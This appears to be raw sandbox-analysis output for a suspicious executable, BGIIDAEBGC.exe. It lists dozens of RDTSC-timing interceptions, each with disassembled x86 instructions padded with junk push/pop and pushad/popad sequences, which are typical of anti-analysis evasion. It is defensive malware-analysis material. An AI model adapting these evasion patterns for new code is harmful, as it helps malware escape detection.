                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B7029C second address: 4B702C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F69D121AB2Ah 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B702C2 second address: 4B702C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B702C6 second address: 4B702CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B90679 second address: 4B9067D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B9067D second address: 4B90683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B90683 second address: 4B9068A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 48h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B9068A second address: 4B906AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F69D121AB2Ah 0x0000000d xchg eax, ecx 0x0000000e pushad 0x0000000f mov bx, 9870h 0x00000013 popad 0x00000014 mov eax, dword ptr [76FB65FCh] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B906AE second address: 4B906B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B906B4 second address: 4B90711 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test eax, eax 0x0000000c jmp 00007F69D121AB31h 0x00000011 je 00007F6A435BDDBBh 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F69D121AB33h 0x00000020 add ecx, 7BA5C72Eh 0x00000026 jmp 00007F69D121AB39h 0x0000002b popfd 0x0000002c mov edi, eax 0x0000002e popad 0x0000002f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B90711 second address: 4B9072D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D1080A58h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B9072D second address: 4B9078E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, eax 0x0000000a pushad 0x0000000b mov ch, dl 0x0000000d push esi 0x0000000e movsx edi, si 0x00000011 pop eax 0x00000012 popad 0x00000013 xor eax, dword ptr [ebp+08h] 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F69D121AB38h 0x0000001d adc ecx, 27135168h 0x00000023 jmp 00007F69D121AB2Bh 0x00000028 popfd 0x00000029 movzx ecx, bx 0x0000002c popad 0x0000002d and ecx, 1Fh 0x00000030 pushad 0x00000031 mov dx, B244h 0x00000035 push edi 0x00000036 mov ecx, 392CEA4Fh 0x0000003b pop eax 0x0000003c popad 0x0000003d ror eax, cl 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 mov dx, si 0x00000045 pushad 0x00000046 popad 0x00000047 popad 0x00000048 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B9078E second address: 4B90794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B90794 second address: 4B90798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B90798 second address: 4B907F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 pushad 0x0000000a movsx edi, si 0x0000000d movzx esi, di 0x00000010 popad 0x00000011 retn 0004h 0x00000014 nop 0x00000015 mov esi, eax 0x00000017 lea eax, dword ptr [ebp-08h] 0x0000001a xor esi, dword ptr [00512014h] 0x00000020 push eax 0x00000021 push eax 0x00000022 push eax 0x00000023 lea eax, dword ptr [ebp-10h] 0x00000026 push eax 0x00000027 call 00007F69D5741222h 0x0000002c push FFFFFFFEh 0x0000002e jmp 00007F69D1080A57h 0x00000033 pop eax 0x00000034 pushad 0x00000035 mov bx, si 0x00000038 movzx esi, dx 0x0000003b popad 0x0000003c ret 0x0000003d nop 0x0000003e push eax 0x0000003f call 00007F69D574123Eh 0x00000044 mov edi, edi 0x00000046 pushad 0x00000047 movsx edi, ax 0x0000004a mov ah, 05h 0x0000004c popad 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F69D1080A59h 0x00000055 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B907F4 second address: 4B907FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B907FA second address: 4B907FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B4002F second address: 4B40055 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F69D121AB34h 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B40055 second address: 4B40096 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F69D1080A56h 0x0000000f mov ebp, esp 0x00000011 jmp 00007F69D1080A50h 0x00000016 and esp, FFFFFFF8h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B40096 second address: 4B4009A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B4009A second address: 4B400A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B400A0 second address: 4B400A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B400A6 second address: 4B400AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B400AA second address: 4B400CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 jmp 00007F69D121AB2Ah 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F69D121AB2Eh 0x00000016 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B400CE second address: 4B400E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D1080A4Eh 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B400E0 second address: 4B4012D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 jmp 00007F69D121AB37h 0x0000000e xchg eax, ebx 0x0000000f jmp 00007F69D121AB36h 0x00000014 push eax 0x00000015 jmp 00007F69D121AB2Bh 0x0000001a xchg eax, ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e movsx edi, ax 0x00000021 mov edi, eax 0x00000023 popad 0x00000024 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B4012D second address: 4B40189 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, BABAh 0x00000007 pushfd 0x00000008 jmp 00007F69D1080A4Bh 0x0000000d adc al, 0000005Eh 0x00000010 jmp 00007F69D1080A59h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebx, dword ptr [ebp+10h] 0x0000001c jmp 00007F69D1080A4Eh 0x00000021 xchg eax, esi 0x00000022 jmp 00007F69D1080A50h 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B40189 second address: 4B401A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B401A5 second address: 4B401BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B401BB second address: 4B401BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B401BF second address: 4B401C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B401C3 second address: 4B401C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B401C9 second address: 4B40205 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F69D1080A4Dh 0x00000015 sbb ax, C4B6h 0x0000001a jmp 00007F69D1080A51h 0x0000001f popfd 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B40205 second address: 4B40213 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D121AB2Ah 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B40213 second address: 4B40217 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B40217 second address: 4B40248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ax, dx 0x0000000d popad 0x0000000e mov dword ptr [esp], edi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov cx, A623h 0x00000018 jmp 00007F69D121AB38h 0x0000001d popad 0x0000001e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B40248 second address: 4B4027B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F69D1080A56h 0x00000010 je 00007F6A4346EDECh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B4027B second address: 4B4027F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B4027F second address: 4B40285 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B40285 second address: 4B4028B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B4028B second address: 4B4028F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B4028F second address: 4B402A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B402A4 second address: 4B402A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B402A8 second address: 4B402AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B402AE second address: 4B402D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F6A4346EDB1h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F69D1080A4Ah 0x00000018 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B402D4 second address: 4B402E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B402E3 second address: 4B40327 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c jmp 00007F69D1080A4Eh 0x00000011 or edx, dword ptr [ebp+0Ch] 0x00000014 pushad 0x00000015 mov ebx, 776A6830h 0x0000001a popad 0x0000001b test edx, 61000000h 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B40327 second address: 4B4032B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B4032B second address: 4B4032F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B4032F second address: 4B40335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B40335 second address: 4B4037F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, CF8Ch 0x00000007 pushfd 0x00000008 jmp 00007F69D1080A55h 0x0000000d adc cl, 00000066h 0x00000010 jmp 00007F69D1080A51h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 jne 00007F6A4346ED64h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F69D1080A4Dh 0x00000026 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B4037F second address: 4B403B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 movzx ecx, di 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test byte ptr [esi+48h], 00000001h 0x00000010 jmp 00007F69D121AB2Bh 0x00000015 jne 00007F6A43608E2Dh 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F69D121AB30h 0x00000024 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B403B4 second address: 4B403BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B3070C second address: 4B30791 instructions: 0x00000000 rdtsc 0x00000002 mov bx, 5576h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F69D121AB38h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F69D121AB31h 0x00000017 and ecx, 35479186h 0x0000001d jmp 00007F69D121AB31h 0x00000022 popfd 0x00000023 mov edx, eax 0x00000025 popad 0x00000026 xchg eax, ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F69D121AB2Fh 0x00000030 or cl, FFFFFFBEh 0x00000033 jmp 00007F69D121AB39h 0x00000038 popfd 0x00000039 pushad 0x0000003a popad 0x0000003b popad 0x0000003c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B30791 second address: 4B307E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F69D1080A56h 0x00000010 and esp, FFFFFFF8h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F69D1080A57h 0x0000001a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B307E0 second address: 4B3081E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F69D121AB2Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F69D121AB2Dh 0x00000019 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B3081E second address: 4B30822 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B30822 second address: 4B30828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B30828 second address: 4B3083F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D1080A53h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B3083F second address: 4B3085C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F69D121AB2Eh 0x00000011 push esi 0x00000012 pop edi 0x00000013 popad 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B3085C second address: 4B30862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B30862 second address: 4B30866 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B30866 second address: 4B30875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B30875 second address: 4B30879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B30879 second address: 4B3087F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B3087F second address: 4B308AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F69D121AB2Ah 0x00000015 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B308AA second address: 4B308B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B308B9 second address: 4B30931 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F69D121AB2Fh 0x00000009 and cx, F11Eh 0x0000000e jmp 00007F69D121AB39h 0x00000013 popfd 0x00000014 mov esi, 134202E7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov esi, dword ptr [ebp+08h] 0x0000001f jmp 00007F69D121AB2Ah 0x00000024 sub ebx, ebx 0x00000026 jmp 00007F69D121AB31h 0x0000002b test esi, esi 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F69D121AB38h 0x00000036 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B30931 second address: 4B30940 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B30940 second address: 4B309BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F6A43610557h 0x0000000f pushad 0x00000010 mov cx, 2A23h 0x00000014 pushfd 0x00000015 jmp 00007F69D121AB38h 0x0000001a sbb cx, 4568h 0x0000001f jmp 00007F69D121AB2Bh 0x00000024 popfd 0x00000025 popad 0x00000026 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002d jmp 00007F69D121AB36h 0x00000032 mov ecx, esi 0x00000034 pushad 0x00000035 push ecx 0x00000036 movsx edi, cx 0x00000039 pop ecx 0x0000003a pushad 0x0000003b mov bx, 82F8h 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B309BF second address: 4B309E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 je 00007F6A43476424h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F69D1080A58h 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B309E5 second address: 4B309EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B309EB second address: 4B309EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 4B309EF second address: 4B30A3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [76FB6968h], 00000002h 0x0000000f jmp 00007F69D121AB39h 0x00000014 jne 00007F6A436104C5h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushfd 0x0000001e jmp 00007F69D121AB2Ah 0x00000023 sbb ah, FFFFFFE8h 0x00000026 jmp 00007F69D121AB2Bh 0x0000002b popfd 0x0000002c rdtsc
